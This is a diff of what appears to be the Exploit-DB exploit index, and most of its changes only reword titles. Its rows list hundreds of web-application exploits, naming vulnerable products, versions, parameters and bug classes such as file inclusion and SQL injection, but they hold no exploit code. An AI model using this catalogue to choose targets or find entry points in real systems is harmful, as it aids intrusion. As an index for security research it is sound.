30456,platforms/php/webapps/30456.txt,"VietPHP - '_functions.php' dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30457,platforms/php/webapps/30457.txt,"VietPHP - 'admin/index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 -30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - 'Password' Parameter SQL Injection",2007-11-26,JosS,php,webapps,0 +30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - 'Password' SQL Injection",2007-11-26,JosS,php,webapps,0 30459,platforms/php/webapps/30459.txt,"VietPHP - 'index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution",2014-01-14,"Arash Abedian",hardware,webapps,80 30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30472,platforms/linux/webapps/30472.rb,"Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,webapps,7071 30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80 @@ -31880,14 +31881,14 @@ id,file,description,date,author,platform,type,port 30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30482,platforms/php/webapps/30482.txt,"Web News 1.1 - 'feed.php config[root_ordner]' Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30483,platforms/php/webapps/30483.txt,"Web News 1.1 - 'news.php config[root_ordner]' Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30482,platforms/php/webapps/30482.txt,"Web News 1.1 - 'feed.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30483,platforms/php/webapps/30483.txt,"Web News 1.1 - 'news.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0 30487,platforms/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0 30489,platforms/php/webapps/30489.txt,"Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0 30492,platforms/php/webapps/30492.txt,"SkilMatch Systems JobLister3 - 'index.php' SQL Injection",2007-07-13,joseph.giron13,php,webapps,0 -30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusion",2007-07-09,Crackers_Child,php,webapps,0 +30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusions",2007-07-09,Crackers_Child,php,webapps,0 30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 - admin.php Remote Authentication Bypass",2007-07-16,imei,php,webapps,0 30505,platforms/asp/webapps/30505.txt,"Text File Search Classic - TextFileSearch.asp Cross-Site Scripting",2007-08-17,GeFORC3,asp,webapps,0 30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 @@ -31896,32 +31897,32 @@ id,file,description,date,author,platform,type,port 30514,platforms/java/webapps/30514.txt,"ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting",2007-08-21,MustLive,java,webapps,0 30515,platforms/php/webapps/30515.txt,"coWiki - 'index.php' Cross-Site Scripting",2007-08-21,MustLive,php,webapps,0 30516,platforms/php/webapps/30516.txt,"m-phorum 0.3 - 'index.php' Cross-Site Scripting",2007-08-21,CodeXpLoder'tq,php,webapps,0 -30518,platforms/php/webapps/30518.txt,"Ripe Website Manager 0.8.x - pages/delete_page.php id Parameter SQL Injection",2007-08-22,"Nagendra Kumar G",php,webapps,0 +30518,platforms/php/webapps/30518.txt,"Ripe Website Manager 0.8.x - 'pages/delete_page.php?id' SQL Injection",2007-08-22,"Nagendra Kumar G",php,webapps,0 30520,platforms/php/webapps/30520.txt,"WordPress 1.0.7 - Pool index.php Cross-Site Scripting",2007-08-13,MustLive,php,webapps,0 30525,platforms/php/webapps/30525.txt,"Arcadem 2.01 - 'index.php' Remote File Inclusion",2007-08-24,sm0k3,php,webapps,0 30531,platforms/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 - 'index.php' Cross-Site Scripting",2007-08-27,d3hydr8,php,webapps,0 30533,platforms/php/webapps/30533.txt,"Dale Mooney Calendar Events - Viewevent.php SQL Injection",2007-08-27,s0cratex,php,webapps,0 30534,platforms/php/webapps/30534.txt,"PHPGedView 4.1 - 'login.php' Cross-Site Scripting",2007-08-27,"Joshua Morin",php,webapps,0 30539,platforms/php/webapps/30539.txt,"ACG News 1.0 - 'index.php' Multiple SQL Injections",2007-08-28,SmOk3,php,webapps,0 -30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 / CUCM 4.2 - Logon Page 'lang' Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0 +30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 / CUCM 4.2 - Logon Page 'lang' SQL Injection",2007-08-29,anonymous,asp,webapps,0 30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0 30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750u ME_1.09 - Cross-Site Request Forgery",2013-12-28,"FIGHTERx war",hardware,webapps,0 30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Inclusion",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 31030,platforms/php/webapps/31030.pl,"WordPress Plugin SpamBam - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0 30872,platforms/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,php,webapps,0 -30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - form.php Multiple Parameter Cross-Site Scripting",2007-09-07,cod3in,php,webapps,0 -30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - admin/header.php Multiple Parameter Cross-Site Scripting",2007-09-07,cod3in,php,webapps,0 +30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - 'form.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,php,webapps,0 +30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - 'admin/header.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,php,webapps,0 30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 - admin.php Authentication Bypass",2007-09-03,Demential,php,webapps,0 -30556,platforms/php/webapps/30556.html,"Claroline 1.x - inc/lib/language.lib.php language Parameter Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0 -30557,platforms/php/webapps/30557.txt,"Claroline 1.x - admin/adminusers.php dir Parameter Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 -30558,platforms/php/webapps/30558.txt,"Claroline 1.x - admin/advancedUserSearch.php action Parameter Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 -30559,platforms/php/webapps/30559.txt,"Claroline 1.x - admin/campusProblem.php view Parameter Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 +30556,platforms/php/webapps/30556.html,"Claroline 1.x - 'inc/lib/language.lib.php?language' Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0 +30557,platforms/php/webapps/30557.txt,"Claroline 1.x - 'admin/adminusers.php?dir' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 +30558,platforms/php/webapps/30558.txt,"Claroline 1.x - 'admin/advancedUserSearch.php?action' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 +30559,platforms/php/webapps/30559.txt,"Claroline 1.x - 'admin/campusProblem.php?view' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 30560,platforms/php/webapps/30560.txt,"212Cafe WebBoard 6.30 - 'Read.php' SQL Injection",2007-09-04,"Lopez Bran Digrap",php,webapps,0 31025,platforms/cgi/webapps/31025.txt,"Garment Center - 'index.cgi' Local File Inclusion",2008-01-14,Smasher,cgi,webapps,0 30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 - CSS Expression Input Validation",2007-11-10,"Tomas Kuliavas",php,webapps,0 30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 - users/register.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0 30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - search/index.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0 -30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0 +30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - 'search/index.php?highlight' SQL Injection",2007-11-10,Doz,php,webapps,0 30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion",2007-11-10,d3v1l,php,webapps,0 30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 - 'login.asp' SQL Injection",2007-09-04,SmOk3,asp,webapps,0 @@ -31930,23 +31931,23 @@ id,file,description,date,author,platform,type,port 30571,platforms/asp/webapps/30571.txt,"Proxy Anket 3.0.1 - anket.asp SQL Injection",2007-09-10,Yollubunlar.Org,asp,webapps,0 30572,platforms/php/webapps/30572.txt,"PHPMyQuote 0.20 - 'index.php' SQL Injection / Cross-Site Scripting",2007-09-10,Yollubunlar.Org,php,webapps,0 30573,platforms/php/webapps/30573.txt,"SisfoKampus - dwoprn.php Arbitrary File Download",2007-09-10,PUPET,php,webapps,0 -30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 - forum_forum.php id Parameter Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 -30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 - text_search_action.php search_string Parameter Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 +30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 - 'forum_forum.php?id' Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 +30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 - 'text_search_action.php?search_string' Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 30577,platforms/php/webapps/30577.txt,"SWSoft Plesk 8.2 - 'login.php3' PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 32387,platforms/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",php,webapps,0 32415,platforms/php/webapps/32415.txt,"Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections",2008-09-24,"Justin C. Klein Keane",php,webapps,0 32413,platforms/php/webapps/32413.txt,"InterTech WCMS - 'etemplate.php' SQL Injection",2008-09-23,"GeNiUs IrAQI",php,webapps,0 -32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform - 'browser.asp' Parameter Directory Traversal",2008-09-23,AlbaniaN-[H],asp,webapps,0 +32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform - 'browser.asp' Directory Traversal",2008-09-23,AlbaniaN-[H],asp,webapps,0 32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting",2008-09-23,"Hadi Kiamarsi",php,webapps,0 32410,platforms/php/webapps/32410.txt,"6rbScript - 'cat.php' SQL Injection",2008-09-22,"Karar Alshami",php,webapps,0 32389,platforms/php/webapps/32389.txt,"Quick Cart 3.1 - 'admin.php' Cross-Site Scripting",2008-09-17,"John Cobb",php,webapps,0 -32409,platforms/php/webapps/32409.txt,"Achievo 1.3.2 - 'atknodetype' Parameter Cross-Site Scripting",2008-09-20,"Rohit Bansal",php,webapps,0 +32409,platforms/php/webapps/32409.txt,"Achievo 1.3.2 - 'atknodetype' Cross-Site Scripting",2008-09-20,"Rohit Bansal",php,webapps,0 32408,platforms/php/webapps/32408.txt,"BlueCUBE CMS - 'tienda.php' SQL Injection",2008-09-21,r45c4l,php,webapps,0 32407,platforms/php/webapps/32407.txt,"BLUEPAGE CMS 2.5 - 'PHPSESSID' Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 32406,platforms/php/webapps/32406.txt,"xt:Commerce 3.04 - XTCsid Parameter Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 -32405,platforms/php/webapps/32405.txt,"xt:Commerce 3.04 - advanced_search_result.php keywords Parameter Cross-Site Scripting",2008-09-22,"David Vieira-Kurz",php,webapps,0 +32405,platforms/php/webapps/32405.txt,"xt:Commerce 3.04 - 'advanced_search_result.php?keywords' Cross-Site Scripting",2008-09-22,"David Vieira-Kurz",php,webapps,0 32404,platforms/php/webapps/32404.html,"Fuzzylime (cms) 3.0 - 'usercheck.php' Cross-Site Scripting",2008-09-22,"Fabian Fingerle",php,webapps,0 -32403,platforms/php/webapps/32403.txt,"MapCal 0.1 - 'id' Parameter SQL Injection",2008-09-22,0x90,php,webapps,0 +32403,platforms/php/webapps/32403.txt,"MapCal 0.1 - 'id' SQL Injection",2008-09-22,0x90,php,webapps,0 32402,platforms/php/webapps/32402.txt,"UNAK-CMS - Cookie Authentication Bypass",2008-09-22,Ciph3r,php,webapps,0 32401,platforms/asp/webapps/32401.txt,"rgb72 WCMS 1.0 - 'index.php' SQL Injection",2008-09-22,"CWH Underground",asp,webapps,0 35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Persistent Cross-Site Scripting",2014-12-08,"Manish Tanwar",php,webapps,0 @@ -31961,37 +31962,37 @@ id,file,description,date,author,platform,type,port 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,php,webapps,0 30583,platforms/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - Tracking.php Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps,0 30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 -30586,platforms/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/pwdgrp.cgi Multiple Parameter Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 +30586,platforms/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera - Web Interface 'axis-cgi/admin/pwdgrp.cgi' Multiple Cross-Site Request Forgery Vulnerabilities",2007-09-14,"Seth Fogie",cgi,webapps,0 30587,platforms/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera - Web Interface admin/restartMessage.shtml server Parameter Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 30588,platforms/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 - Command Execution",2007-09-17,anonymous,php,webapps,0 30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise 7.1 - Remote Command Execution",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0 -30594,platforms/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.12 - 'referer' Parameter Cross-Site Scripting",2007-09-17,L4teral,php,webapps,0 -30595,platforms/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.12 - 'log' Parameter Local File Inclusion",2007-09-17,L4teral,php,webapps,0 +30594,platforms/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.12 - 'referer' Cross-Site Scripting",2007-09-17,L4teral,php,webapps,0 +30595,platforms/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.12 - 'log' Local File Inclusion",2007-09-17,L4teral,php,webapps,0 30596,platforms/php/webapps/30596.txt,"b1gMail 6.3.1 - hilfe.php Cross-Site Scripting",2007-09-17,malibu.r,php,webapps,0 30597,platforms/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - RC Parameter Cross-Site Scripting Vulnerabilities",2007-09-19,azizov,cgi,webapps,0 30598,platforms/cgi/webapps/30598.txt,"WebBatch - 'webbatch.exe' URL Cross-Site Scripting",2007-09-20,Doz,cgi,webapps,0 -30599,platforms/cgi/webapps/30599.txt,"WebBatch - 'webbatch.exe dumpinputdata' Parameter Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 +30599,platforms/cgi/webapps/30599.txt,"WebBatch - 'webbatch.exe?dumpinputdata' Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module - Multiple Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,php,webapps,0 30602,platforms/php/webapps/30602.html,"WordPress 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 30603,platforms/php/webapps/30603.html,"XCMS 1.1/1.7 - Password Parameter Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 30606,platforms/cgi/webapps/30606.txt,"Urchin 5.7.x - session.cgi Cross-Site Scripting",2007-09-24,pagvac,cgi,webapps,0 30607,platforms/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module - index.php SQL Injection",2007-09-24,"nights shadow",php,webapps,0 -30608,platforms/jsp/webapps/30608.txt,"JSPWiki 2.5.139 - NewGroup.jsp Multiple Parameter Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30608,platforms/jsp/webapps/30608.txt,"JSPWiki 2.5.139 - 'NewGroup.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 30609,platforms/jsp/webapps/30609.txt,"JSPWiki 2.5.139 - edit.jsp edittime Parameter Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30610,platforms/jsp/webapps/30610.txt,"JSPWiki 2.5.139 - Comment.jsp Multiple Parameter Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30611,platforms/jsp/webapps/30611.txt,"JSPWiki 2.5.139 - UserPreferences.jsp Multiple Parameter Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30612,platforms/jsp/webapps/30612.txt,"JSPWiki 2.5.139 - Login.jsp Multiple Parameter Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30613,platforms/jsp/webapps/30613.txt,"JSPWiki 2.5.139 - Diff.jsp Multiple Parameter Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30610,platforms/jsp/webapps/30610.txt,"JSPWiki 2.5.139 - 'Comment.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30611,platforms/jsp/webapps/30611.txt,"JSPWiki 2.5.139 - 'UserPreferences.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30612,platforms/jsp/webapps/30612.txt,"JSPWiki 2.5.139 - 'Login.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30613,platforms/jsp/webapps/30613.txt,"JSPWiki 2.5.139 - 'Diff.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module - 'index.php' Local File Inclusion",2007-09-25,waraxe,php,webapps,0 30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 - 'admin/' Default URI l_username Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 -30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 - admin/emoticonlist.php l_emoticonlist Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 -30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - 'l_username' Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 -30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - 'backurl' Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 +30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 - 'admin/emoticonlist.php?l_emoticonlist' Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 +30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - 'l_username' Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 +30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - 'backurl' Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 30621,platforms/asp/webapps/30621.txt,"Novus 1.0 - Buscar.asp Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps,0 30623,platforms/php/webapps/30623.pl,"MD-Pro 1.0.76 - 'index.php' Firefox ID SQL Injection",2007-09-29,"unidentified1_ is",php,webapps,0 30624,platforms/asp/webapps/30624.txt,"Netkamp Emlak Scripti - Multiple Input Validation Vulnerabilities",2007-10-01,GeFORC3,asp,webapps,0 -30625,platforms/asp/webapps/30625.txt,"Ohesa Emlak Portal 1.0 - satilik.asp Kategori Parameter SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 -30626,platforms/asp/webapps/30626.txt,"Ohesa Emlak Portal 1.0 - detay.asp Emlak Parameter SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 +30625,platforms/asp/webapps/30625.txt,"Ohesa Emlak Portal 1.0 - 'satilik.asp?Kategori' SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 +30626,platforms/asp/webapps/30626.txt,"Ohesa Emlak Portal 1.0 - 'detay.asp?Emlak' SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 30629,platforms/asp/webapps/30629.txt,"ASP Product Catalog 1.0 - default.asp SQL Injection",2007-10-01,joseph.giron13,asp,webapps,0 30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 - 'index.php' Cross-Site Scripting",2007-10-03,Gokhan,php,webapps,0 30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0 @@ -32002,7 +32003,7 @@ id,file,description,date,author,platform,type,port 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0 30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0 30641,platforms/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - 'login.php' mode Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 -30642,platforms/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - 'default.asp mode2' Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 +30642,platforms/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - 'default.asp?mode2' Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 - 'News_page.php' Cross-Site Scripting",2007-10-08,medconsultation.ru,php,webapps,0 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews - 'Dnewsweb.exe' Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 30651,platforms/php/webapps/30651.txt,"Joomla! Component WebMaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Inclusion",2007-10-10,Cyber-Crime,php,webapps,0 @@ -32011,12 +32012,12 @@ id,file,description,date,author,platform,type,port 30655,platforms/php/webapps/30655.txt,"Joomla! Component Search 1.0.13 - SearchWord Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 30656,platforms/php/webapps/30656.txt,"BoastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,php,webapps,0 30657,platforms/php/webapps/30657.txt,"UMI CMS - 'index.php' Cross-Site Scripting",2007-10-11,anonymous,php,webapps,0 -30658,platforms/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0 +30658,platforms/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusions",2007-10-11,iNs,php,webapps,0 30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 Courses - 'detail.php' Multiple SQL Injections",2007-10-11,durito,php,webapps,0 30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - Report.cgi Authentication Bypass",2007-10-11,MustLive,cgi,webapps,0 30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 - Content Management System main.php SQL Injection",2007-10-11,durito,php,webapps,0 -30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 - 'index.php' Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0 +30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 - 'index.php' Multiple Remote File Inclusions",2007-10-11,iNs,php,webapps,0 30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 - Merchant shop.php SQL Injection",2007-10-11,durito,php,webapps,0 30665,platforms/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE / NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass",2014-01-03,"Amplia Security Advisories",hardware,webapps,0 30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple Cross-Site Request Forgery Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 @@ -32025,16 +32026,16 @@ id,file,description,date,author,platform,type,port 30865,platforms/php/webapps/30865.txt,"DomPHP 0.83 - Local Directory Traversal",2014-01-12,Houssamix,php,webapps,0 30795,platforms/cgi/webapps/30795.txt,"GWExtranet - Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0 30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 - Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0 -31530,platforms/php/webapps/31530.txt,"Joomla! / Mambo Component Download3000 1.0 - 'id' Parameter SQL Injection",2008-03-23,S@BUN,php,webapps,0 +31530,platforms/php/webapps/31530.txt,"Joomla! / Mambo Component Download3000 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,php,webapps,0 31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 - 'haberoku.php' SQL Injection",2008-03-25,cOndemned,php,webapps,0 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script - Cross-Site Scripting",2007-10-15,JosS,java,webapps,0 30675,platforms/jsp/webapps/30675.txt,"InnovaPortal - tc/contents/home001.jsp contentid Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 30676,platforms/jsp/webapps/30676.txt,"InnovaPortal - msg.jsp msg Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 -30682,platforms/php/webapps/30682.txt,"SiteBar 3.3.8 - translator.php dir Parameter Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 +30682,platforms/php/webapps/30682.txt,"SiteBar 3.3.8 - 'translator.php?dir' Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 30683,platforms/php/webapps/30683.txt,"SiteBar 3.3.8 - 'translator.php upd/cmd/Action/edit' Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 -30684,platforms/php/webapps/30684.txt,"SiteBar 3.3.8 - integrator.php lang Parameter Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 